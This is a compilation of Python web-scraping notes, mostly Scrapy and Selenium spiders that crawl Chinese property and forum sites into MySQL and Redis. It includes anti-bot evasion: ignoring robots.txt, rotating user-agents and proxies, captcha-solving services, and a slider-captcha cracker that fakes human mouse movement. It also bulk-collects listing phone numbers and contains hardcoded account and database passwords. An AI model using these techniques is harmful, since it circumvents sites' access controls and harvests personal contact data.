    driver.find_element_by_id("captcha_field").send_keys(captcha_code)
    # log in
    driver.find_element_by_class_name("bn-submit").click()
# get the cookies
cookies = {i["name"]: i["value"] for i in driver.get_cookies()}
print(cookies)
time.sleep(5)
# driver.quit()
~~~
selenium: crawling lagou.com
```
Open a page in a new window: self.driver.execute_script("window.open('%s')" % link)
Switch to the new tab: self.driver.switch_to.window(self.driver.window_handles[1])
Close the current detail page: self.driver.close()
Switch back to the job-list tab: self.driver.switch_to.window(self.driver.window_handles[0])
```
JS snippet: scroll to the bottom of the page
~~~python
code_js = "window.scrollTo(0,document.body.scrollHeight)"
self.driver.execute_script(code_js)
~~~
# 10. Basic scrapy usage
scrapy genspider -t crawl spider_name allow_domain
~~~python
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
import re
class CfSpider(CrawlSpider):
name = 'cf'
allowed_domains = ['circ.gov.cn']
start_urls = ['http://bxjg.circ.gov.cn/web/site0/tab5240/module14430/page1.htm']
    # rules describing which urls to extract
    rules = (
        # LinkExtractor: extracts url addresses
        # callback: the response of each extracted url is handed to this method
        # follow: whether the response of the current url is run through the rules again
        Rule(LinkExtractor(allow=r'/web/site0/tab5240/info\d+\.htm'), callback='parse_item', follow=False),
        Rule(LinkExtractor(allow=r'/web/site0/tab5240/module14430/page\d+\.htm'), follow=True),
    )
    # CrawlSpider uses parse() internally to drive the link extractors, so do not override it
def parse_item(self, response):
item = {}
item["title"] = re.findall(r"<!--TitleStart-->(.*?)<!--TitleEnd-->", response.body.decode("utf-8"))[0]
item["publish_date"] = re.findall(r"发布时间:(20\d{2}-\d{2}-\d{2})", response.body.decode("utf-8"))[0]
print(item)
# yield scrapy.Request(
# url,
# callback=self.parse_detail,
# meta={"item":item}
# )
#
# def parse_detail(self,response):
# item = response.meta("item")
# item["price"] = "///"
# yield item
~~~
spider.py
~~~python
# -*- coding: utf-8 -*-
import re
import scrapy
from scrapy_redis.spiders import RedisSpider
from fangtianxia.items import NewHouseItem, ESFHouseItem, RentHouseItem
class SfwSpider(RedisSpider):
name = 'sfw'
allowed_domains = ['fang.com']
# start_urls = ['https://www.fang.com/SoufunFamily.htm']
redis_key = 'fangtianxia' # lpush fangtianxia https://www.fang.com/SoufunFamily.htm
def parse(self, response):
tr_list = response.xpath("//div[@class='outCont']//tr")
province = None
for tr in tr_list:
# 没有class属性的td
td_list = tr.xpath("./td[not(@class)]")
province_td = td_list[0]
province_text = province_td.xpath(".//text()").get()
province_text = re.sub(r"\s", "", province_text)
# 如果有province_text,保存起来
if province_text:
province = province_text
# 不爬取海外信息
if province == "其它":
continue
city_td = td_list[1]
city_links = city_td.xpath(".//a")
for city_link in city_links:
# 城市名
city = city_link.xpath(".//text()").get()
# 城市名对应的url
city_url = city_link.xpath(".//@href").get()
# print("省份", province)
# print("城市", city)
# print("城市链接", city_url)
# 北京新房、二手房url、租房例外
if "bj" in city_url:
newhouse_url = "https://newhouse.fang.com/house/s/"
esf_url = "https://esf.fang.com/"
rent_url = "https://zu.fang.com/"
else:
# 构建新房的url链接
newhouse_url = city_url.split(".")[0] + ".newhouse.fang.com/house/s/"
# 构建二手房的url链接
esf_url = city_url.split(".")[0] + ".esf.fang.com/"
# 构建租房url链接
rent_url = city_url.split(".")[0] + ".zu.fang.com/"
# print("新房", newhouse_url)
# print("二手房", esf_url)
yield scrapy.Request(
url=newhouse_url,
callback=self.parse_newhouse,
meta={"item": (province, city)}
)
yield scrapy.Request(
url=esf_url,
callback=self.parse_esf,
meta={"item": (province, city)}
)
yield scrapy.Request(
url=rent_url,
callback=self.parse_rent,
meta={'item':(province, city)}
)
    # parse the new-house listing page
def parse_newhouse(self, response):
print(response.request.headers['User-Agent'])
province, city = response.meta.get("item")
li_list = response.xpath("//div[contains(@class,'nl_con')]/ul/li")
try:
for li in li_list:
name = li.xpath(".//div[@class='nlcd_name']/a/text()").get()
if name is not None: # 页面有广告
name = name.strip()
house_tpye_list = li.xpath(".//div[contains(@class,'house_type')]/a/text()").getall()
rooms = list(map(lambda x: re.sub(r"\s|/|-", "", x), house_tpye_list))
rooms = "".join(rooms)
area = "".join(li.xpath(".//div[contains(@class,'house_type')]/text()").getall()) # 列表转化字符串
area = re.sub(r"\s|/|-", "", area)
district_text = "".join(li.xpath(".//div[@class='address']/a//text()").getall())
district = re.search(r".*\[(.+)\].*", district_text)
if district is not None:
district = district.group(1)
address = li.xpath(".//div[@class='address']/a/@title").get()
sale = li.xpath(".//div[contains(@class,'fangyuan')]/span/text()").get()
price = "".join(li.xpath(".//div[@class='nhouse_price']//text()").getall())
price = re.sub(r"\s|广告", "", price)
origin_url = "http:" + li.xpath(".//div[@class='nlcd_name']/a/@href").get()
tel = "".join(li.xpath(".//div[@class='tel']//text()").getall()).strip()
item = NewHouseItem(province=province, city=city, name=name, rooms=rooms,
area=area, district=district, address=address, sale=sale,
price=price, origin_url=origin_url, tel=tel)
yield item
except Exception as e:
            self.logger.error(e)
# 下一页
next_url = response.xpath("//div[@class='page']//a[@class='next']/@href").get()
yield scrapy.Request(url=response.urljoin(next_url), callback=self.parse_newhouse,
meta={"item": (province, city)})
    # parse the second-hand listing page
def parse_esf(self, response):
print(response.request.headers['User-Agent'])
province, city = response.meta.get("item")
dl_list = response.xpath("//div[contains(@class,'shop_list')]/dl")
try:
for dl in dl_list:
item = ESFHouseItem(province=province, city=city)
name = dl.xpath(".//p[@class='add_shop']/a/@title").get()
item['name'] = name
if name is not None: # 页面有广告
info_list = dl.xpath(".//p[@class='tel_shop']/text()").getall()
info_list = list(map(lambda x: re.sub(r"\s", "", x), info_list))
# print(info_list) # ['4室2厅', '133.84㎡', '高层(共16层)', '南北向', '2003年建', '']
for info in info_list:
if "厅" in info:
item['rooms'] = info
elif "㎡" in info:
item['area'] = info
elif "层" in info:
item["floor"] = info
elif "向" in info:
item['toward'] = info
elif "建" in info:
item["year"] = info
item['address'] = ''.join(dl.xpath(".//p[@class='add_shop']/span/text()").getall())
price = dl.xpath(".//dd[@class='price_right']/span//text()").getall()
# 总价
item['price'] = price[0] + price[1]
# 单价
item['unit'] = price[-1]
origin_url = dl.xpath(".//h4[@class='clearfix']/a/@href").get()
# /chushou/3_244089396.htm
item['origin_url'] = response.urljoin(origin_url)
# 获取详情页电话
yield scrapy.Request(url=item['origin_url'], callback=self.parse_esf_detail, meta={'item': item})
except Exception as e:
            self.logger.error(e)
# 下一页
next_url = response.xpath("//a[text()='下一页']/@href").get()
if next_url is not None:
yield scrapy.Request(
url=response.urljoin(next_url),
callback=self.parse_esf,
meta={"item": (province, city)}
)
    # parse the second-hand detail page
def parse_esf_detail(self, response):
item = response.meta.get('item')
item['tel'] = response.xpath("//span[@id='mobilecode']/text()").get()
yield item
    # parse the rental listing page
def parse_rent(self, response):
print(response.request.headers['User-Agent'])
province, city = response.meta.get("item")
rent_detail_url_list = response.xpath("//p[@class='title']/a/@href").getall()
rent_detail_url_list = list(map(lambda x: response.urljoin(x), rent_detail_url_list))
for rent_detail_url in rent_detail_url_list:
yield scrapy.Request(
url=rent_detail_url,
callback=self.parse_rent_detail,
meta={"item": (province, city)}
)
        # next page
        next_url = response.xpath("//a[text()='下一页']/@href").get()
        if next_url is not None:
            yield scrapy.Request(url=response.urljoin(next_url),
                                 callback=self.parse_rent,  # paginate the rental listing with the rental parser
                                 meta={"item": (province, city)}
                                 )
    # parse the rental detail page
def parse_rent_detail(self, response):
province, city = response.meta.get("item")
item = RentHouseItem(province=province, city=city)
try:
price = response.xpath("//div[contains(@class,'trl-item sty1')]//text()").getall()
item['price'] = ''.join(list(map(lambda x:re.sub(r'\s', '', x), price)))
rent_toward_list = response.xpath("//div[@class='trl-item1 w146']/div[@class='tt']/text()").getall()
item['rent_method'] = rent_toward_list[0] if len(rent_toward_list)>0 else None
item['toward'] = rent_toward_list[1] if len(rent_toward_list)>1 else None
rooms_floor_list = response.xpath("//div[@class='trl-item1 w182']/div[@class='tt']/text()").getall()
item['rooms'] = rooms_floor_list[0] if len(rooms_floor_list)>0 else None
item['floor'] = rooms_floor_list[1] if len(rooms_floor_list)>1 else None
area_decoration_list = response.xpath("//div[@class='trl-item1 w132']/div[@class='tt']/text()").getall()
item['area'] = area_decoration_list[0] if len(area_decoration_list)>0 else None
item['decoration'] = area_decoration_list[1] if len(area_decoration_list)>1 else None
address_list = response.xpath("//div[contains(@class,'rcont')]//text()").getall()
item['address'] = ''.join(list(map(lambda x:re.sub(r'\s', '', x), address_list)))
item['origin_url'] = response.url
# tel = response.xpath("//div[@class='tjcont-jjr-line2 clearfix']/text()").get()
# if tel:
# item['tel'] = tel.strip()
# else:
# item['tel'] = tel
tel = response.xpath("//div[@class='trlcont rel']//text()").getall()
item['tel'] = None
for i in tel:
if re.findall(r'\d{11}', i):
item['tel'] = i.strip()
# print(item)
yield item
except Exception as e:
            self.logger.error(e)
~~~
pipeline.py: saving items to a JSON lines file
~~~python
import re
from scrapy.exporters import JsonLinesItemExporter
class YangguangPipeline(object):
    def __init__(self):
        self.fp = open("yangguang.json", "wb")  # the exporter writes bytes, so open the file in binary mode
        self.exporter = JsonLinesItemExporter(self.fp, ensure_ascii=False, encoding="utf-8")
    def open_spider(self, spider):  # called when the spider is opened
        print("spider started...")
    def process_item(self, item, spider):  # called for every item the spider yields
        item["content"] = self.process_content(item["content"])
        print(item)
        self.exporter.export_item(item)
        return item
    def process_content(self, content):
        content = [re.sub(r"\xa0|\s", "", i) for i in content]
        content = [i for i in content if len(i) > 0]  # drop empty strings
        return content
    def close_spider(self, spider):  # called when the spider is closed
        self.fp.close()
        print("spider finished...")
~~~
pipeline.py: per-table storage and asynchronous database writes with twisted
~~~python
from datetime import datetime
from fangtianxia.items import NewHouseItem, ESFHouseItem, RentHouseItem
from pymysql import cursors
from twisted.enterprise import adbapi
class FangtianxiaTwistedPipeline(object):
"""异步保存到数据库"""
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': 'mysql123',
'database': 'fangtianxia',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
self._sql = None
@property
def sql(self):
        if not self._sql:
            self._sql = """
                insert into newhouse(id,province,city,name,rooms,area,price,address,district,sale,origin_url,tel,crawl_time)
                values (null,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)
            """
        return self._sql
def process_item(self, item, spider):
"""分表保存"""
if isinstance(item, NewHouseItem):
# runInteraction将同步转化为异步处理
defer = self.dbpool.runInteraction(self.insert_item_newhouse, item)
# 错误处理
defer.addErrback(self.handle_error, item, spider)
if isinstance(item, ESFHouseItem):
defer = self.dbpool.runInteraction(self.insert_item_esfhouse, item)
defer.addErrback(self.handle_error, item, spider)
if isinstance(item, RentHouseItem):
defer = self.dbpool.runInteraction(self.insert_item_renthouse, item)
defer.addErrback(self.handle_error, item, spider)
def insert_item_newhouse(self, cursor, item):
"""保存新房数据到MySQL"""
crawl_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
cursor.execute(
self.sql,
(item.get('province'), item.get('city'), item.get('name'), item.get('rooms'),
item.get('area'), item.get('price'), item.get('address'), item.get('district'),
item.get('sale'), item.get('origin_url'), item.get('tel'), crawl_time)
)
def insert_item_esfhouse(self, cursor, item):
"""保存二手房数据到MySQL"""
crawl_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sql_esfhouse = "insert into esfhouse(id,province,city,name,rooms,floor,toward,year,address,area,price,unit,origin_url,tel,crawl_time) values (null,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
cursor.execute(
sql_esfhouse,
(item.get('province'), item.get('city'), item.get('name'), item.get('rooms'),
item.get('floor'), item.get('toward'), item.get('year'), item.get('address'),
item.get('area'), item.get('price'), item.get('unit'), item.get('origin_url'),
item.get('tel'), crawl_time)
)
def insert_item_renthouse(self, cursor, item):
"""保存租房数据到MySQL"""
crawl_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sql_renthouse = "insert into renthouse(id, province, city, decoration, floor, price, area, rent_method, address, rooms, toward, origin_url, tel, crawl_time) value (null, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
cursor.execute(
sql_renthouse,
(item.get('province'), item.get('city'), item.get('decoration'), item.get('floor'),
item.get('price'), item.get('area'), item.get('rent_method'), item.get('address'),
item.get('rooms'), item.get('toward'), item.get('origin_url'),
item.get('tel'), crawl_time)
)
def handle_error(self, error, item, spider):
print("=" * 20 + "error" + "=" * 20)
print(error)
print("=" * 20 + "error" + "=" * 20)
~~~
middleware.py: handling the user-agent and the proxy
~~~python
import redis
import requests
from scrapy import signals
from fake_useragent import UserAgent
class RandomUserAgent(object):
    """random user-agent middleware"""
    def process_request(self, request, spider):
        user_agent = UserAgent()
        request.headers['User-Agent'] = user_agent.random
class IPProxyMiddleware(object):
    """random proxy middleware"""
    def process_request(self, request, spider):
        if 'proxy' not in request.meta:
            proxy = self.get_proxy_from_redis()
            request.meta['proxy'] = 'https://' + proxy  # actually attach the proxy to the request
            print(f"this is request ip:{proxy}")
def process_response(self, request, response, spider):
if response.status != 200:
proxy = self.get_proxy_from_redis()
print(f"this is response ip:{proxy}")
request.meta['proxy'] = 'https://' + proxy
return request
return response
def get_proxy(self):
"""随机从代理池中读取proxy"""
PROXY_POOL_URL = 'http://localhost:5555/random'
try:
response = requests.get(PROXY_POOL_URL)
if response.status_code == 200:
return response.text
except Exception as e:
            print('Proxy_pool connect failed', e)
return None
def get_proxy_from_redis(self):
"""从redis中读取随机代理"""
redis_connection = redis.Redis(host='localhost',port=6379,db=0)
try:
proxy = redis_connection.srandmember('proxy_pool')
# print(proxy)
return proxy.decode()
except Exception as e:
            print('Proxy_pool connect failed', e)
return None
~~~
settings.py: basic settings
~~~python
ROBOTSTXT_OBEY = False
LOG_LEVEL = "WARNING"
LOG_FILE = "info.log"
# make all spiders share the same dedup fingerprints
DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter"
# store requests in redis
SCHEDULER = "scrapy_redis.scheduler.Scheduler"
# keep the scrapy-redis queues in redis instead of clearing them, so crawls can be paused and resumed
SCHEDULER_PERSIST = True
# redis connection info
REDIS_URL = "redis://127.0.0.1:6379/0"
# scrapy-redis-bloomfilter
# DUPEFILTER_CLASS = "scrapy_redis_bloomfilter.dupefilter.RFPDupeFilter"
# number of hash functions, 6 by default (can be changed)
BLOOMFILTER_HASH_NUMBER = 6
# bit parameter of the Bloom filter, 30 by default: about 128 MB of memory, dedups on the order of 100 million requests
BLOOMFILTER_BIT = 30
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'
}
DOWNLOADER_MIDDLEWARES = {
# 'fangtianxia.middlewares.FangtianxiaDownloaderMiddleware': 543,
'fangtianxia.middlewares.RandomUserAgent': 540,
'fangtianxia.middlewares.IPProxyMiddleware': 541,
}
ITEM_PIPELINES = {
'fangtianxia.pipelines.FangtianxiaTwistedPipeline': 300,
}
~~~
# 11. scrapy_login
~~~python
# -*- coding: utf-8 -*-
import scrapy
import re
from urllib import request
from PIL import Image
from yundama import identify
import requests
class DoubanSpider(scrapy.Spider):
name = 'douban'
allowed_domains = ['douban.com']
start_urls = ['https://accounts.douban.com/login']
login_url = 'https://accounts.douban.com/login'
profile_url = 'https://www.douban.com/people/187541834/'
edit_signature_url = 'https://www.douban.com/j/people/187541834/edit_signature'
def parse(self, response):
formdata = {
'source': 'None',
'redir': 'https://www.douban.com/',
'form_email': 'aircov@163.com',
'form_password': 'douban123456',
'remember': 'on',
'login': '登录'
}
# 验证码url
captcha_url = response.xpath("//img[@id='captcha_image']/@src").get()
# print("*"*50)
# print(captcha_img)
if captcha_url:
captcha = self.recognize_captcha(captcha_url)
formdata["captcha-solution"] = captcha
captcha_id = response.xpath("//input[@name='captcha-id']/@value").get()
formdata["captcha-id"] = captcha_id
print(formdata)
yield scrapy.FormRequest(
url=self.login_url,
formdata=formdata,
callback=self.after_login
)
# 登录成功,豆瓣主页面
def after_login(self, response):
if response.url == 'https://www.douban.com/':
print("登录成功!")
yield scrapy.Request(
self.profile_url,
callback=self.parse_profile
)
else:
print("登录失败!")
print(re.findall(r"这是我自己修改的", response.body.decode("utf-8")))
# 个人主页
def parse_profile(self,response):
if response.url == 'https://www.douban.com/people/187541834/':
print("进入到了个人主页!")
# <input type="hidden" name="ck" value="Xdd_" disabled="">
ck = response.xpath("//input[@name='ck']/@value").get()
# 构造form表单,发送请求,修改签名
formdata = {
"ck":ck,
"signature":"我就是我,不一样的烟火~~"
}
yield scrapy.FormRequest(
self.edit_signature_url,
callback=self.parse_none,
formdata=formdata
)
print("修改签名成功。。。")
else:
print("没有进入个人主页!")
    # a Request yielded without callback= is handled by this spider's default parse() method
def parse_none(self,response):
pass
# 调用打码平台识别验证码
def recognize_captcha(self, img_url):
request.urlretrieve(img_url, "captcha.png") # 保存图片到本地
captcha_content = requests.get(img_url).content # 请求验证码地址 获取响应
captcha_code = identify(captcha_content) # 调用打码平台
print("验证码的识别结果为:%s" % captcha_code)
return captcha_code
~~~
next_url = urllib.parse.urljoin(response.url, next_url) completes a relative url against the response url automatically
```
yield scrapy.Request(url=response.urljoin(next_url), callback=self.parse_newhouse,
meta={"item": (province, city)})
```
~~~python
# -*- coding: utf-8 -*-
import scrapy
import urllib
import requests
from tieba.items import TiebaItem
import re
class TbSpider(scrapy.Spider):
name = 'tb'
allowed_domains = ['tieba.baidu.com']
start_urls = ['https://tieba.baidu.com/f?ie=utf-8&kw=%E6%9D%8E%E6%AF%85&fr=search&pn=0&']
def parse(self, response):
# 根据帖子进行分组
div_list = response.xpath("//div[contains(@class, 'i')]")
for div in div_list:
item = TiebaItem()
item["href"] = div.xpath("./a/@href").get()
item["title"] = div.xpath("./a/text()").get()
item["img_list"] = []
if item["href"] is not None:
                # complete the relative url automatically
item["href"] = urllib.parse.urljoin(response.url, item["href"])
# print(item)
yield scrapy.Request(
item["href"],
callback=self.parse_detail_url,
meta={"item": item}
)
# 列表页de翻页
next_url = response.xpath("//a[text()='下一页']/@href").get()
if next_url is not None:
next_url = urllib.parse.urljoin(response.url, next_url)
yield scrapy.Request(
next_url,
callback=self.parse,
)
def parse_detail_url(self,response): # 处理详情页
item = response.meta["item"]
# if "img_list" not in item:
# item["img_list"] = re.findall(r'<a href="(http://c\.hiphotos\.baidu\.com/forum/.*?)">.*?</a>',response.body.decode("utf-8"))
# else:
# <a href="http://c.hiphotos.baidu.com/forum/w%3D400%3Bq%3D80%3Bg%3D0/sign=f5e39e97...c.jpg">图</a>
try:
item["img_list"].extend(re.findall(r'<a href="(http://c\.hiphotos\.baidu\.com/forum/.*?)">.*?</a>',response.body.decode("utf-8")))
except Exception as e:
print("%s:%s" % (e,response.url))
next_url = response.xpath("//a[text()='下一页']/@href").get()
if next_url is not None: # 表示有下一页
next_url = urllib.parse.urljoin(response.url, next_url)
yield scrapy.Request(
next_url,
callback=self.parse_detail_url,
meta={"item": item}
)
else:
            # decode the urls with requests.utils.unquote(i)
item["img_list"] = [requests.utils.unquote(i).split("src=")[-1].strip() for i in item["img_list"]]
# print(item)
yield item
~~~
# 12. xpath summary
`//div[@class='xxx']/ul/li[not(@class)]/span/a/text()` li tags without a class attribute
`//div[contains(@class,'xxx')]/span[last()]/a/text()` the last span under a div whose class contains 'xxx'
`//a[text()='下一页']/@href` a tags whose text equals "下一页" ("next page")
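A tiny lxml check of the last pattern (the HTML snippet is made up for illustration):
~~~python
from lxml import etree

html = etree.HTML("<div class='page'><a href='/list_2.html'>下一页</a></div>")  # made-up snippet
print(html.xpath("//a[text()='下一页']/@href"))  # ['/list_2.html']
~~~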
# 13. Formatting date/time strings in Python
```python
crawl_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
```
# 14. Incremental and resumable crawling with redis
set in scrapy's settings.py:
```python
# make all spiders share the same dedup fingerprints
DUPEFILTER_CLASS = "scrapy_redis.dupefilter.RFPDupeFilter"
# store requests in redis
SCHEDULER = "scrapy_redis.scheduler.Scheduler"
# keep the scrapy-redis queues in redis instead of clearing them, so crawls can be paused and resumed
SCHEDULER_PERSIST = True
# redis connection info
REDIS_URL = "redis://47.102.99.199:6379/2"
```
# 15. Random user-agent setup
configured in middleware.py:
```python
class KuanspiderDownloaderMiddleware(object):
......
def process_request(self, request, spider):
"""设置随机请求头"""
ua = UserAgent()
request.headers['User-Agent'] = ua.random
```
Check the user-agent that was actually sent:
```python
class KuanSpider(scrapy.Spider):
......
def parse(self, response):
print(response.request.headers["User-Agent"])
```
# 16. Saving files and images
~~~python
def save_content_list(self, content_list):
with open("douyu_anchor.json", "w", encoding="utf-8") as f:
for content in content_list:
f.write(json.dumps(content, ensure_ascii=False) + "\n")
~~~
```python
import os
from urllib import request
item = {
'title':category,
'image':image_url
}
file_path = './img/'+item['title']
if not os.path.exists(file_path):
os.mkdir(file_path)
if not os.path.exists(file_path+item['image']):
request.urlretrieve(item['image'], file_path+item['image'])
```
# 17. urlencode: completing url query parameters
~~~python
import requests
import urllib3
from urllib.parse import urlencode
from requests.exceptions import RequestException

def get_page_index(keyword, city_code, offset):
data = {
'query': keyword,
'scity': city_code,
'page': offset,
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
}
proxies = {
'http': 'http://127.0.0.1:8087',
'https': 'https://127.0.0.1:8087'
}
url = 'https://www.zhipin.com/job_detail/?' + urlencode(data)
try:
urllib3.disable_warnings()
res = requests.get(url, headers=headers)
if res.status_code == 200:
return res.text
elif requests.get(url, headers=headers, proxies=proxies, verify=False).status_code == 200:
res1 = requests.get(url, headers=headers, proxies=proxies, verify=False)
return res1.text
return None
except RequestException:
print('请求初始页出错')
return None
~~~
# 18. MySQL deduplication
```mysql
-- find duplicate values of a single column
select name from films group by name having count(*)>1;
-- find rows duplicated on multiple columns and return all their fields
select * from films where(films.name,films.box_office) in (select name,box_office from films group by name,box_office having count(*)>1);
-- delete duplicate rows from the table:
-- 1. build a temporary table t2 holding the smallest id of each group of duplicates
-- 2. join on the columns that define a duplicate
-- 3. delete the rows in the original table whose id is larger than the id kept in t2
delete films from films,(select min(id) id,name,released from films group by name,released having count(*)>1) t2 where films.name = t2.name and films.released = t2.released and films.id>t2.id;
```
# 19. Using the logging module / scrapy.log
```python
log_name = 'sb_spider_log.log'
logging.basicConfig( # 日志输出信息
filename=log_name,
filemode='a',
level=logging.INFO,
datefmt='%Y-%m-%d %A %H:%M:%S')
......
logging.info('Page crawling succeeded')
logging.error()
```
~~~python
# LOG_LEVER = "INFO"
# LOG_FILE = "info.log"
from scrapy import log
......
log.error(e)
~~~
# 20. Garbled Chinese in python3 crawlers: the 'Accept-Encoding: br' request header
'Accept-Encoding' is sent by the browser to tell the server which content encodings it accepts, typically gzip, deflate, br, and so on.
On response.text and response.content in the python3 requests package:
response.content  # the response body as bytes; gzip and deflate are decompressed for you automatically
response.text     # the response body as str, decoded using the charset from the response headers
By default, however, requests does not decode br!
br stands for Brotli, a newer lossless data format with a very high compression ratio (higher than gzip).
~~~python
import brotli
# 获取网页内容,返回html数据
response = requests.get(url, headers=headers)
# 通过状态码判断是否获取成功
if response.status_code == 200:
print(response.headers)
print(response.encoding)
key = 'Content-Encoding'
if(key in response.headers and response.headers['Content-Encoding'] == 'br'):
data = brotli.decompress(response.content)
data1 = data.decode('utf-8')
print(data1)
~~~
# 21. Getting cookies with requests
~~~python
user_id = re.search(r'"uniqueid":"(\d+)"', user_info).group(1)
print(user_id)
url = 'https://weibo.com/u/{}/home'.format(user_id)
response = self.sess.get(url)
# <class 'requests.structures.CaseInsensitiveDict'> 转化成字典
cookies = dict(response.request.headers)
with open('./cookies.txt','w') as f:
f.write(cookies['Cookie'])
~~~
# 22. Cracking slider captchas
~~~python
import cv2
import time
import requests
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from PIL import Image
from io import BytesIO
import numpy as np
from config import username, password
class Login163(object):
"""
使用opencv识别验证码中缺口位置,获取需要滑动距离,并使用selenium模仿人类行为破解滑动验证码
"""
def __init__(self, username=None, password=None):
self.username = username
self.password = password
self.driver = webdriver.Chrome()
self.driver.set_window_size(1280, 900)
self.wait = WebDriverWait(self.driver, 20)
self.url = 'https://dl.reg.163.com/ydzj/maildl?product=urs&curl=https://m.reg.163.com/'
self.zoom = 1
def get_pic(self):
"""获取图片"""
target = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'yidun_bg-img'))).get_attribute('src')
template = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'yidun_jigsaw'))).get_attribute('src')
target_img = Image.open(BytesIO(requests.get(target).content))
template_img = Image.open(BytesIO(requests.get(template).content))
target_img.save('target.jpg')
template_img.save('template.png')
local_img = Image.open('target.jpg')
size_loc = local_img.size
self.zoom = 391 / int(size_loc[0]) # 缩放系数为391除以本地的宽度,391为目标图片在网页上的宽度
print('self.zoom:', self.zoom)
def match(self, target, template):
img_rgb = cv2.imread(target)
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread(template, 0)
run = 1
w, h = template.shape[::-1]
print(w, h)
res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
# 使用二分法查找阈值的精确值
L = 0
R = 1
while run < 20:
run += 1
threshold = (R + L) / 2
print(threshold)
if threshold < 0:
print('Error')
return None
loc = np.where(res >= threshold)
print(len(loc[1]))
if len(loc[1]) > 1:
L += (R - L) / 2
elif len(loc[1]) == 1:
print('目标区域起点x坐标为:%d' % loc[1][0])
break
elif len(loc[1]) < 1:
R -= (R - L) / 2
return loc[1][0]
def get_tracks(self, distance):
"""
根据偏移量获取移动轨迹
:param distance: 偏移量
:return: 移动轨迹
"""
distance += 20
print('distance:', distance)
v = 0
t = 0.2
forward_tracks = []
current = 0
mid = distance * 3 / 5
while current < distance:
if current < mid:
a = 2
else:
a = -3
s = v * t + 0.5 * a * (t ** 2)
v = v + a * t
current += s
forward_tracks.append(round(s))
back_tracks = [-3, -3, -2, -2, -2, -2, -2, -1, -1, -1]
return {'forward_tracks': forward_tracks, 'back_tracks': back_tracks}
def crack_slider(self):
self.get_pic()
target = 'target.jpg'
template = 'template.png'
distance = self.match(target, template)
tracks = self.get_tracks((distance + 18) * self.zoom) # 对位移的缩放计算 18需要自己调整
print('tracks', tracks)
slider = self.driver.find_element_by_class_name("yidun_slider") # 需要滑动的元素
ActionChains(self.driver).click_and_hold(slider).perform() # 鼠标按住左键不放
for track in tracks['forward_tracks']:
ActionChains(self.driver).move_by_offset(xoffset=track, yoffset=0).perform()
time.sleep(0.5)
for back_tracks in tracks['back_tracks']:
ActionChains(self.driver).move_by_offset(xoffset=back_tracks, yoffset=0).perform()
ActionChains(self.driver).move_by_offset(xoffset=-3, yoffset=0).perform()
ActionChains(self.driver).move_by_offset(xoffset=3, yoffset=0).perform()
time.sleep(1)
ActionChains(self.driver).release().perform() # 释放鼠标
time.sleep(1)
self.driver.find_element_by_xpath("//div[@class='bButton_btn ']/button").click()
# 重试
try:
failure = WebDriverWait(self.driver, 5).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'yidun_tips__text'), '向右拖动滑块填充拼图'))
print(failure)
except:
failure = None
if failure:
self.crack_slider()
# 错误
try:
error = WebDriverWait(self.driver, 5).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'yidun_tips__text'), '失败过多,点此重试'))
print(error)
except:
error = None
if error:
error.click()
time.sleep(2)
self.crack_slider()
def run(self):
self.driver.get(self.url)
self.driver.find_elements_by_xpath("//div[@class='ipt_wrap large']/input")[0].send_keys(self.username)
self.driver.find_elements_by_xpath("//div[@class='ipt_wrap large']/input")[1].send_keys(self.password)
# 点击登录
self.driver.find_element_by_xpath("//div[@class='u-btn c-main']/button").click()
# 验证机器人行为
try:
robot = WebDriverWait(self.driver, 3).until(EC.presence_of_element_located((By.CLASS_NAME, 'yidun_tips')))
if robot:
print("正在验证机器人行为!")
wait = WebDriverWait(self.driver, 20).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'yidun_tips__text'), '验证成功'))
if wait:
self.driver.find_element_by_xpath("//div[@class='u-btn c-main']/button").click()
except:
pass
# 跳转页面
time.sleep(1)
try:
self.driver.find_element_by_class_name("u-icon-img").click()
time.sleep(2)
except:
pass
# 滑动验证码页面
self.crack_slider()
if self.driver.current_url == 'https://m.reg.163.com/#/email':
cookies = {i["name"]: i["value"] for i in self.driver.get_cookies()}
print(cookies)
print(self.driver.current_url)
# 关闭webdriver
time.sleep(5)
self.driver.close()
if __name__ == '__main__':
username = username
password = password
login163 = Login163(username=username, password=password).run()
~~~
~~~python
def FindPic(target, template):
"""
找出图像中最佳匹配位置
:param target: 目标即背景图
:param template: 模板即需要找到的图
:return: 返回最佳匹配及其最差匹配和对应的坐标
"""
target_rgb = cv2.imread(target)
target_gray = cv2.cvtColor(target_rgb, cv2.COLOR_BGR2GRAY)
template_rgb = cv2.imread(template, 0)
res = cv2.matchTemplate(target_gray, template_rgb, cv2.TM_CCOEFF_NORMED)
value = cv2.minMaxLoc(res)
~~~
